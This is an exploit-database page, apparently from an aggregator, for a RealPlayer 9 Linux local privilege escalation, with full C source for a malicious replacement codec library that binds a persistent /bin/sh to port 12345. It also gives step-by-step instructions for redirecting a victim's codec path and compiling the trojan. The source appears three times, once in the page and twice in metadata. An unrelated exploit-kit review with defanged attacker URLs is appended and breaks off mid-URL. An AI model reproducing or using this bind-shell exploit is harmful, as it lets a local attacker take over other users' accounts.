RealPlayer 9 *nix Local Privilege Escalation Exploit
2003-09-09T00:00:00
ID 1337DAY-ID-7314 Type zdt Reporter Jon Hart Modified 2003-09-09T00:00:00
Description
Exploit for linux platform in category local exploits
====================================================
RealPlayer 9 *nix Local Privilege Escalation Exploit
====================================================
/**
* rp9-priv-esc.c
*
* A local privilege escalation attack against the community supported
* version of Real.com's Realplayer, version 9.
*
* Written by:
*
* Jon Hart warchild spoofed.org
*
* By default, configuration files are stored in ~$USER/.realnetworks/,
* but all the files in there are group writeable. So long as ~$USER
* has group execution permissions (which is pretty common), a malicious
* local user can edit the config files of fellow users to do his biddings.
*
* There are a number of ways to attack this, but after some poking it seems
* that modifying the path to shared libraries and writing my own malicious
* shared libraries was the easiest.
*
* (as an aside, just because the shared libraries in the directories contained
* in ~$USER/.realnetworks/RealShared_0_0/ are stripped doesn't mean we can't get
* the symbols back. objdump quickly can tell us what the names of the 15
* functions are, and we can stub out a bogus shared library pretty quickly.)
*
* This particular bit of code is meant to replace the shared library
* cook.so.6.0, which is contained in the Codecs directory. To execute this
* attack against a fellow local user, first edit their config file
* (~victim/.realnetworks/RealShared_0_0) to have the 'dt_codecs' variable
* point to a directory under your control, like /tmp/Codecs. Copy all of the
* existing files from the previous value of dt_codecs (which is usually something
* like ~victim/Real/Codecs/) to /tmp/Codecs. Next, compile the code below as a
* shared library and copy it to the trojaned directory:
*
*
* `gcc -shared -fPIC -o /tmp/Codecs/cook.so.6.0 rp9-priv-esc.c`
*
* The next time the victim fires up realplayer 9, a nice little shell
* will be listening on port 12345 for you:
*
* [email protected]:/$ id
* uid=1006(guest) gid=100(users) groups=100(users)
* [email protected]:/$ nc localhost 12345
* id
* uid=1000(warchild) gid=100(users) groups=100(users),40(src),1003(wheel)
*
* Of course, you don't have to execute a shell. Do whatever makes you happy.
*
* Fix? `chmod 700 ~/.realnetworks/*`
*
* Copyright (c) 2003, Jon Hart
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* * Neither the name of the organization nor the names of its contributors may
* be used to endorse or promote products derived from this software without
* specific prior written permission.
*
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
* USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*
*
*
*/
#define PORT 12345
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>
void RAInitEncoder(void) { }
/** This just happens to be one of the first
* functions that realplayer calls after cook.so.6.0 is loaded
*/
void RAOpenCodec2(void) { cookthis(); }
void RAOpenCodec(void) { }
void RAGetNumberOfFlavors(void) { }
void RACloseCodec(void) { }
void RADecode(void) { }
void RAEncode(void) { }
void RAFreeEncoder(void) { }
void RAGetNumberOfFlavors2(void) { }
void RAFreeDecoder(void) { }
void RAFlush(void) { }
void RAGetFlavorProperty(void) { }
void G2(void) { }
void RASetFlavor(void) { }
void RAInitDecoder(void) { }
void RACreateEncoderInstance(void) { }
/* Bind /bin/sh to PORT. It forks
* and all that good stuff, so it won't
* easily go away.
*/
int cookthis() {
int sock_des, sock_client, sock_recv, sock_len, server_pid, client_pid;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
if ((sock_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
exit(EXIT_FAILURE);
bzero((char *) &server_addr, sizeof(server_addr));
server_addr.sin_family = AF_INET;
server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
server_addr.sin_port = htons(PORT);
if ((sock_recv = bind(sock_des, (struct sockaddr *) &server_addr, sizeof(server_addr))) != 0)
exit(EXIT_FAILURE);
if (fork() != 0)
exit(EXIT_SUCCESS);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(EXIT_SUCCESS);
if ((sock_recv = listen(sock_des, 5)) != 0)
exit(EXIT_SUCCESS);
while (1) {
sock_len = sizeof(client_addr);
if ((sock_client = accept(sock_des, (struct sockaddr *) &client_addr, &sock_len)) < 0)
exit(EXIT_SUCCESS);
client_pid = getpid();
server_pid = fork();
if (server_pid != 0) {
dup2(sock_client,0);
dup2(sock_client,1);
dup2(sock_client,2);
execl("/bin/sh","realplay",(char *)0);
close(sock_client);
exit(EXIT_SUCCESS);
}
close(sock_client);
}
}
# 0day.today [2018-01-04] #
{"hash": "931c79c98b555d2cc5eeddfc66f60905cfc39ae9f8f876fab08200ecadee77c7", "id": "1337DAY-ID-7314", "lastseen": "2018-01-04T05:18:21", "viewCount": 2, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "2377a01dacca015b7d114bd5f7a07e71", "key": "href"}, {"hash": "4f2280bb3115db76c2ae61e73b454f68", "key": "modified"}, {"hash": "4f2280bb3115db76c2ae61e73b454f68", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "adad7b0122d696aa84d825e3ecddf5c5", "key": "reporter"}, {"hash": "6221fb9f0727066a20e6661b0c1562ce", "key": "sourceData"}, {"hash": "aa51b4e0ebc3d59caddce4981e3407ae", "key": "sourceHref"}, {"hash": "cf897909b6fd6bc055ba4601e3417939", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2018-01-04T05:18:21"}, "dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:151671", "PACKETSTORM:146547"]}, {"type": "joomla", "idList": ["JVEL:591"]}, {"type": "exploitdb", "idList": ["EDB-ID:44160"]}, {"type": "zdt", "idList": ["1337DAY-ID-29866"]}, {"type": "dsquare", "idList": ["E-275"]}, {"type": "openvas", "idList": ["OPENVAS:863106", "OPENVAS:1361412562310863107", "OPENVAS:863107", "OPENVAS:1361412562310863106"]}, {"type": "nessus", "idList": ["FEDORA_2011-7289.NASL", "FEDORA_2011-7302.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:7314"]}], "modified": "2018-01-04T05:18:21"}, "vulnersScore": 0.6}, "type": "zdt", "sourceHref": "https://0day.today/exploit/7314", "description": "Exploit for linux platform in category local exploits", "title": "RealPlayer 9 *nix Local Privilege Escalation Exploit", "history": [{"bulletin": {"hash": "198c1383b33e02eee73b1baa6ab4753846ba66fb1d5b799d321a385624020fae", "id": "1337DAY-ID-7314", "lastseen": "2016-04-20T01:56:00", "enchantments": {"score": {"value": 6.6, "modified": "2016-04-20T01:56:00"}}, "hashmap": [{"hash": "a1de415ca0f24e6de15671422605d0fb", "key": "sourceData"}, {"hash": "4f2280bb3115db76c2ae61e73b454f68", "key": "published"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "4f2280bb3115db76c2ae61e73b454f68", "key": "modified"}, {"hash": "8fac114651189454e51924db13a86c0b", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cf897909b6fd6bc055ba4601e3417939", "key": "title"}, {"hash": "adad7b0122d696aa84d825e3ecddf5c5", "key": "reporter"}, {"hash": "341d8398e0f31605c843a7fbef7fbb10", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/7314", "description": "Exploit for linux platform in category local exploits", "viewCount": 1, "title": "RealPlayer 9 *nix Local Privilege Escalation Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "====================================================\r\nRealPlayer 9 *nix Local Privilege Escalation Exploit\r\n====================================================\r\n\r\n\r\n/**\r\n * rp9-priv-esc.c \r\n *\r\n * A local privilege escalation attack against the community supported\r\n * version of Real.com's Realplayer, version 9.\r\n *\r\n * Written by:\r\n * \t\r\n * \tJon Hart warchild spoofed.org\r\n *\r\n * By default, configuration files are stored in ~$USER/.realnetworks/, \r\n * but all the files in there are group writeable. So long as ~$USER \r\n * has group execution permissions (which is pretty common), a malicious\r\n * local user can edit the config files of fellow users to do his biddings. \r\n *\r\n * There are a number of ways to attack this, but after some poking it seems\r\n * that modifying the path to shared libraries and writing my own malicious\r\n * shared libraries was the easiest. \r\n * \r\n * (as an aside, just because the shared libraries in the directories contained\r\n * in ~$USER/.realnetworks/RealShared_0_0/ are stripped doesn't mean we can't get \r\n * the symbols back. objdump quickly can tell us what the names of the 15 \r\n * functions are, and we can stub out a bogus shared library pretty quickly.)\r\n *\r\n * This particular bit of code is meant to replace the shared library \r\n * cook.so.6.0, which is contained in the Codecs directory. To execute this \r\n * attack against a fellow local user, first edit their config file \r\n * (~victim/.realnetworks/RealShared_0_0) to have the 'dt_codecs' variable\r\n * point to a directory under your control, like /tmp/Codecs. Copy all of the \r\n * existing files from the previous value of dt_codecs (which is usually something\r\n * like ~victim/Real/Codecs/) to /tmp/Codecs. Next, compile the code below as a\r\n * shared library and copy it to the trojaned directory:\r\n *\r\n * \r\n * `gcc -shared -fPIC -o /tmp/Codecs/cook.so.6.0 rp9-priv-esc.c`\r\n *\r\n *\tThe next time the victim fires up realplayer 9, a nice little shell \r\n * will be listening on port 12345 for you:\r\n *\r\n * guest@haiti:/$ id\r\n * uid=1006(guest) gid=100(users) groups=100(users)\r\n * guest@haiti:/$ nc localhost 12345\r\n * id\r\n * uid=1000(warchild) gid=100(users) groups=100(users),40(src),1003(wheel)\r\n *\r\n * Of course, you don't have to execute a shell. Do whatever makes you happy.\r\n *\r\n * Fix? `chmod 700 ~/.realnetworks/*`\r\n *\r\n * Copyright (c) 2003, Jon Hart \r\n * All rights reserved.\r\n *\r\n * Redistribution and use in source and binary forms, with or without modification, \r\n * are permitted provided that the following conditions are met:\r\n *\r\n * * Redistributions of source code must retain the above copyright notice, \r\n * this list of conditions and the following disclaimer.\r\n * * Redistributions in binary form must reproduce the above copyright notice, \r\n * this list of conditions and the following disclaimer in the documentation \r\n * and/or other materials provided with the distribution.\r\n * * Neither the name of the organization nor the names of its contributors may\r\n * be used to endorse or promote products derived from this software without \r\n * specific prior written permission.\r\n *\r\n *\r\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \r\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \r\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE \r\n * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE \r\n * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \r\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \r\n * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \r\n * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \r\n * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE \r\n * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n *\r\n *\r\n *\r\n *\r\n */\r\n#define PORT 12345\r\n#include <stdio.h>\r\n#include <signal.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <stdlib.h>\r\n\r\nvoid RAInitEncoder(void) { }\r\n/** This just happens to be one of the first \r\n * functions that realplayer calls after cook.so.6.0 is loaded\r\n */\r\nvoid RAOpenCodec2(void) { cookthis(); }\r\nvoid RAOpenCodec(void) { }\r\nvoid RAGetNumberOfFlavors(void) { }\r\nvoid RACloseCodec(void) { }\r\nvoid RADecode(void) { }\r\nvoid RAEncode(void) { }\r\nvoid RAFreeEncoder(void) { }\r\nvoid RAGetNumberOfFlavors2(void) { }\r\nvoid RAFreeDecoder(void) { }\r\nvoid RAFlush(void) { }\r\nvoid RAGetFlavorProperty(void) { }\r\nvoid G2(void) { }\r\nvoid RASetFlavor(void) { }\r\nvoid RAInitDecoder(void) { }\r\nvoid RACreateEncoderInstance(void) { }\r\n\r\n/* Bind /bin/sh to PORT. It forks\r\n * and all that good stuff, so it won't \r\n * easily go away.\r\n */\r\nint cookthis() {\r\n\r\n\r\n int sock_des, sock_client, sock_recv, sock_len, server_pid, client_pid;\r\n struct sockaddr_in server_addr; \r\n struct sockaddr_in client_addr;\r\n\r\n if ((sock_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)\r\n exit(EXIT_FAILURE); \r\n\r\n bzero((char *) &server_addr, sizeof(server_addr));\r\n server_addr.sin_family = AF_INET; \r\n server_addr.sin_addr.s_addr = htonl(INADDR_ANY);\r\n server_addr.sin_port = htons(PORT);\r\n\r\n if ((sock_recv = bind(sock_des, (struct sockaddr *) &server_addr, sizeof(server_addr))) != 0) \r\n exit(EXIT_FAILURE); \r\n if (fork() != 0) \r\n exit(EXIT_SUCCESS); \r\n setpgrp(); \r\n signal(SIGHUP, SIG_IGN); \r\n if (fork() != 0) \r\n exit(EXIT_SUCCESS); \r\n if ((sock_recv = listen(sock_des, 5)) != 0)\r\n exit(EXIT_SUCCESS); \r\n while (1) { \r\n sock_len = sizeof(client_addr);\r\n if ((sock_client = accept(sock_des, (struct sockaddr *) &client_addr, &sock_len)) < 0)\r\n exit(EXIT_SUCCESS); \r\n client_pid = getpid(); \r\n server_pid = fork(); \r\n if (server_pid != 0) { \r\n dup2(sock_client,0); \r\n dup2(sock_client,1); \r\n dup2(sock_client,2);\r\n\r\n execl(\"/bin/sh\",\"realplay\",(char *)0); \r\n close(sock_client); \r\n exit(EXIT_SUCCESS); \r\n } \r\n close(sock_client);\r\n }\r\n}\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2003-09-09T00:00:00", "references": [], "reporter": "Jon Hart", "modified": "2003-09-09T00:00:00", "href": "http://0day.today/exploit/description/7314"}, "lastseen": "2016-04-20T01:56:00", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "====================================================\r\nRealPlayer 9 *nix Local Privilege Escalation Exploit\r\n====================================================\r\n\r\n\r\n/**\r\n * rp9-priv-esc.c \r\n *\r\n * A local privilege escalation attack against the community supported\r\n * version of Real.com's Realplayer, version 9.\r\n *\r\n * Written by:\r\n * \t\r\n * \tJon Hart warchild spoofed.org\r\n *\r\n * By default, configuration files are stored in ~$USER/.realnetworks/, \r\n * but all the files in there are group writeable. So long as ~$USER \r\n * has group execution permissions (which is pretty common), a malicious\r\n * local user can edit the config files of fellow users to do his biddings. \r\n *\r\n * There are a number of ways to attack this, but after some poking it seems\r\n * that modifying the path to shared libraries and writing my own malicious\r\n * shared libraries was the easiest. \r\n * \r\n * (as an aside, just because the shared libraries in the directories contained\r\n * in ~$USER/.realnetworks/RealShared_0_0/ are stripped doesn't mean we can't get \r\n * the symbols back. objdump quickly can tell us what the names of the 15 \r\n * functions are, and we can stub out a bogus shared library pretty quickly.)\r\n *\r\n * This particular bit of code is meant to replace the shared library \r\n * cook.so.6.0, which is contained in the Codecs directory. To execute this \r\n * attack against a fellow local user, first edit their config file \r\n * (~victim/.realnetworks/RealShared_0_0) to have the 'dt_codecs' variable\r\n * point to a directory under your control, like /tmp/Codecs. Copy all of the \r\n * existing files from the previous value of dt_codecs (which is usually something\r\n * like ~victim/Real/Codecs/) to /tmp/Codecs. Next, compile the code below as a\r\n * shared library and copy it to the trojaned directory:\r\n *\r\n * \r\n * `gcc -shared -fPIC -o /tmp/Codecs/cook.so.6.0 rp9-priv-esc.c`\r\n *\r\n *\tThe next time the victim fires up realplayer 9, a nice little shell \r\n * will be listening on port 12345 for you:\r\n *\r\n * [email\u00a0protected]:/$ id\r\n * uid=1006(guest) gid=100(users) groups=100(users)\r\n * [email\u00a0protected]:/$ nc localhost 12345\r\n * id\r\n * uid=1000(warchild) gid=100(users) groups=100(users),40(src),1003(wheel)\r\n *\r\n * Of course, you don't have to execute a shell. Do whatever makes you happy.\r\n *\r\n * Fix? `chmod 700 ~/.realnetworks/*`\r\n *\r\n * Copyright (c) 2003, Jon Hart \r\n * All rights reserved.\r\n *\r\n * Redistribution and use in source and binary forms, with or without modification, \r\n * are permitted provided that the following conditions are met:\r\n *\r\n * * Redistributions of source code must retain the above copyright notice, \r\n * this list of conditions and the following disclaimer.\r\n * * Redistributions in binary form must reproduce the above copyright notice, \r\n * this list of conditions and the following disclaimer in the documentation \r\n * and/or other materials provided with the distribution.\r\n * * Neither the name of the organization nor the names of its contributors may\r\n * be used to endorse or promote products derived from this software without \r\n * specific prior written permission.\r\n *\r\n *\r\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \r\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \r\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE \r\n * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE \r\n * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \r\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \r\n * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \r\n * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \r\n * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE \r\n * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n *\r\n *\r\n *\r\n *\r\n */\r\n#define PORT 12345\r\n#include <stdio.h>\r\n#include <signal.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <stdlib.h>\r\n\r\nvoid RAInitEncoder(void) { }\r\n/** This just happens to be one of the first \r\n * functions that realplayer calls after cook.so.6.0 is loaded\r\n */\r\nvoid RAOpenCodec2(void) { cookthis(); }\r\nvoid RAOpenCodec(void) { }\r\nvoid RAGetNumberOfFlavors(void) { }\r\nvoid RACloseCodec(void) { }\r\nvoid RADecode(void) { }\r\nvoid RAEncode(void) { }\r\nvoid RAFreeEncoder(void) { }\r\nvoid RAGetNumberOfFlavors2(void) { }\r\nvoid RAFreeDecoder(void) { }\r\nvoid RAFlush(void) { }\r\nvoid RAGetFlavorProperty(void) { }\r\nvoid G2(void) { }\r\nvoid RASetFlavor(void) { }\r\nvoid RAInitDecoder(void) { }\r\nvoid RACreateEncoderInstance(void) { }\r\n\r\n/* Bind /bin/sh to PORT. It forks\r\n * and all that good stuff, so it won't \r\n * easily go away.\r\n */\r\nint cookthis() {\r\n\r\n\r\n int sock_des, sock_client, sock_recv, sock_len, server_pid, client_pid;\r\n struct sockaddr_in server_addr; \r\n struct sockaddr_in client_addr;\r\n\r\n if ((sock_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)\r\n exit(EXIT_FAILURE); \r\n\r\n bzero((char *) &server_addr, sizeof(server_addr));\r\n server_addr.sin_family = AF_INET; \r\n server_addr.sin_addr.s_addr = htonl(INADDR_ANY);\r\n server_addr.sin_port = htons(PORT);\r\n\r\n if ((sock_recv = bind(sock_des, (struct sockaddr *) &server_addr, sizeof(server_addr))) != 0) \r\n exit(EXIT_FAILURE); \r\n if (fork() != 0) \r\n exit(EXIT_SUCCESS); \r\n setpgrp(); \r\n signal(SIGHUP, SIG_IGN); \r\n if (fork() != 0) \r\n exit(EXIT_SUCCESS); \r\n if ((sock_recv = listen(sock_des, 5)) != 0)\r\n exit(EXIT_SUCCESS); \r\n while (1) { \r\n sock_len = sizeof(client_addr);\r\n if ((sock_client = accept(sock_des, (struct sockaddr *) &client_addr, &sock_len)) < 0)\r\n exit(EXIT_SUCCESS); \r\n client_pid = getpid(); \r\n server_pid = fork(); \r\n if (server_pid != 0) { \r\n dup2(sock_client,0); \r\n dup2(sock_client,1); \r\n dup2(sock_client,2);\r\n\r\n execl(\"/bin/sh\",\"realplay\",(char *)0); \r\n close(sock_client); \r\n exit(EXIT_SUCCESS); \r\n } \r\n close(sock_client);\r\n }\r\n}\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-04] #", "published": "2003-09-09T00:00:00", "references": [], "reporter": "Jon Hart", "modified": "2003-09-09T00:00:00", "href": "https://0day.today/exploit/description/7314"}
{"malwarebytes": [{"lastseen": "2019-07-30T22:45:14", "bulletinFamily": "blog", "description": "In the months since our last [spring review](<https://blog.malwarebytes.com/threat-analysis/2019/05/exploit-kits-spring-2019-review/>), there has been some interesting activity from several exploit kits. While the playing field remains essentially the same with Internet Explorer and Flash Player as the most-commonly-exploited pieces of software, it is undeniable that there has been a marked effort from exploit kit authors to add some rather cool tricks to their arsenal.\n\nFor example, several exploit kits are using session-based keys to prevent \"offline\" replays. This mostly affects security researchers who might want to test the exploit kit in the lab under different scenarios. In other words, a saved network capture won't be worth much when it comes to attempting to reenact the drive-by in a controlled environment.\n\nThe same is true for better detection of virtual machines and network tools (something known as [fingerprinting](<https://blog.malwarebytes.com/cybercrime/exploits/2016/08/browser-based-fingerprinting-implications-and-mitigations/>)). Combining these evasion techniques with geofencing and VPN detection makes exploit kit hunting more challenging than in previous quarters.\n\nThreat actors continue to buy traffic from ad networks and use malvertising as their primary delivery method. Leveraging user profiling (their browser type and version, country of origin, etc.) from ad platforms, criminals are able to maintain decent load rates (successful infection per drive-by attempts).\n\n### Summer 2019 overview\n\n * Spelevo EK\n * Fallout EK\n * Magnitude EK\n * RIG EK\n * GrandSoft EK\n * Underminer EK\n * GreenFlash EK\n\n### Vulnerabilties\n\nInternet Explorer\u2019s [CVE-2018-8174](<https://blog.malwarebytes.com/threat-analysis/2018/05/internet-explorer-zero-day-browser-attack/>) and Flash Player\u2019s [CVE-2018-15982](<https://blog.malwarebytes.com/malwarebytes-news/2018/12/new-flash-player-zero-day-used-russian-facility/>) are the most common vulnerabilities, while the older[ CVE-2018-4878](<https://blog.malwarebytes.com/cybercrime/2018/02/new-flash-player-zero-day-comes-inside-office-document/>) (Flash) is still used by some EKs.\n\n### Spelevo EK\n\nSpelevo EK is the youngest exploit kit, originally [discovered](<https://twitter.com/kafeine/status/1103649040800145409>) in March 2019, but by no means is it behind any of its competitors. \n\n\n\nPayloads seen: PsiXBot, IcedID\n\n### Fallout EK\n\nFallout EK is perhaps one of the more interesting exploit kits. [Nao_Sec](<https://twitter.com/nao_sec>) did a thorough [writeup](<https://nao-sec.org/2019/07/steady-evolution-of-fallout-v4.html>) on it recently, showing a number of new features in its version 4 iteration.\n\n\n\nPayloads seen: AZORult, Osiris, Maze ransomware\n\n### Magnitude EK\n\nMagnitude EK continues to target South Korea with its own Magniber ransomware in steady malvertising campaigns.\n\n\n\nPayload seen: Magniber ransomware\n\n### RIG EK\n\nRIG EK is still kicking around via various malvertising chains and perhaps offers the most diversity in terms of the malware payloads it serves.\n\n\n\nPayloads seen: ERIS, AZORult, Phorpiex, Predator, Amadey, Pitou\n\n### GrandSoft EK\n\nGrandSoft EK remains the weakest exploit kit of the bunch and continues to drop Ramnit in Japan.\n\n\n\nPayload seen: Ramnit\n\n### Underminer EK\n\nUnderminer EK is a rather complex exploit kit with a [complex payload](<https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/>) which we continue to observe via the same delivery chain.\n\n\n\nPayload seen: Hidden Bee\n\n### GreenFlash Sundown EK\n\nThe elusive GreenFlash Sundown EK marked a surprise return via its ShadowGate in a large [malvertising campaign](<https://blog.malwarebytes.com/threat-analysis/2019/06/greenflash-sundown-exploit-kit-expands-via-large-malvertising-campaign/>) in late June.\n\n\n\nPayloads seen: Seon ransomware, Pony, coin miner\n\n### Pseudo-EKs\n\nA few other drive-bys were caught during the past few months, although it might be a stretch to call them exploit kits.\n\n * [azera drive-by](<https://twitter.com/jeromesegura/status/1148289957716344832?s=20>) used the PoC for CVE-2018-15982 (Flash) to drop the ERIS ransomware\n * [Radio EK](<https://nao-sec.org/2019/07/weak-dbd-attack-with-radioek.html>) leveraged CVE-2016-0189 (Internet Explorer) to drop AZORult\n\n### Three years since Angler EK left \n\nJune 2016 is an important date for the web threat landscape, as it marks the [fall of Angler EK](<http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html>), perhaps one of the most successful and sophisticated exploit kits. Since then, exploit kits have never regained their place as the top malware delivery vector. \n\nHowever, since our spring review, we can say there have been some notable events and interesting campaigns. While it's hard to believe that users are still running machines with outdated Internet Explorer and Flash Player versions, this renewed activity proves us wrong.\n\nAlthough we have not mentioned router-based exploit kits in this edition, they are still a valid threat that we expect to grow in the coming months. Also, if exploit kit developers start [branching out of Internet Explorer](<https://www.zdnet.com/article/mozilla-patches-firefox-zero-day-abused-in-the-wild/>) more, we could see far more serious attacks.\n\nMalwarebytes users are protected against the aforementioned drive-by download attacks thanks to our products' anti-exploit layer of technology.\n\n### Indicators of Compromise (URI patterns)\n\n**Spelevo EK**\n \n \n hxxp[://]shark[.]denizprivatne[.]top/barbati-sofia-embed/?id=1fljh8pgb4al2st1r7ui0 \n hxxp[://]shark[.]denizprivatne[.]top/?0186ccfc2affa291487611b&id=1fljh8pgb4al2st1r7ui0 \n hxxp[://]shark[.]denizprivatne[.]top/?8f80b9323f2533ck&id=1fljh8pgb4al2st1r7ui0 \n hxxp[://]shark[.]denizprivatne[.]top/?8f80b9323f2533cbfe19e0483c81dc8b72294a&id=1fljh8pgb4al2st1r7ui0\n\n**Fallout EK**\n \n \n hxxps[://]koreadec[.]com/florulas_8867_11392/brTl/1917-08-03[.]phtml?Patining=eEo \n hxxps[://]koreadec[.]com/4688-garuda/bSkUK/1998_08_17/cokernut-plumages-giglio?misbind=udaler \n hxxps[://]koreadec[.]com/7314/uAFs/sericins/vdJCwq?cjosx=Sturnine-amadous-6883 \n hxxps[://]koreadec[.]com/VfZ/9541_Plucky/apothgm/Purified-Beatifies[.]xhtml?carafe=9109&TIo=nepotious-5579-10022&STlvZ=6372 \n hxxps[://]koreadec[.]com/thereckly_Theatry_lamenter/movant-13555-Procotton/11235/6428-14646-9953?XG53=ethanes-ekename-aldeament&Betwixt=untoggler-6715-anoles&aHvBI=2guk \n hxxps[://]koreadec[.]com/07_11_1981/Bassalian/mUU?aplites=zH1Koq&fBRR=7541_9162_witterly \n hxxps[://]koreadec[.]com/florulas_8867_11392/brTl/1917-08-03[.]phtml?Patining=eEo \n hxxp[://]koreadec[.]com/sSf/Narcotise/tenderer_Tigerfoot_Spackle\n\n**Magnitude EK**\n \n \n hxxp[://]tryfilm[.]site/ \n hxxp[://]cb0p36s1o7v352ddmb[.]outwith[.]space/ \n hxxp[://]e7meue9m8hc243ja5dp8q[.]wroteon[.]club/ \n hxxp[://]wroteon[.]club/10x1b0n236fm0\n\n**RIG EK**\n \n \n hxxp[://]212[.]109[.]198[.]22/?NDE0MzU1&iZdZ&skJLa=known&ljQicPIO=criticized&PbvRlP=detonator&t4gfhtgf4=xfQlKrcFPArhjUODfwIwyIZaUVwb96n8ikbXwRPJgJ_UrxSLNwJEqaKlJLd_mhj2&bmSJmU=vest&IabEYxV=strategy&ffffghds=w3nQMvXcJxfQFYbGMvPDSKNbNknWHViPxomG9MildZeqZGX_k7XDfF-qoVrcCgWR&qRrScLDp=difference&tNEKEWCG=known&qAVUDc=criticized&RWWa=already&NAaUs=difference&tqHbh=referred&XSZz=professional&QqbDBluKn=referred&riObvJqGb=heartfelt&RTXBW=difference&QEcvAFNjYzNTc= \n 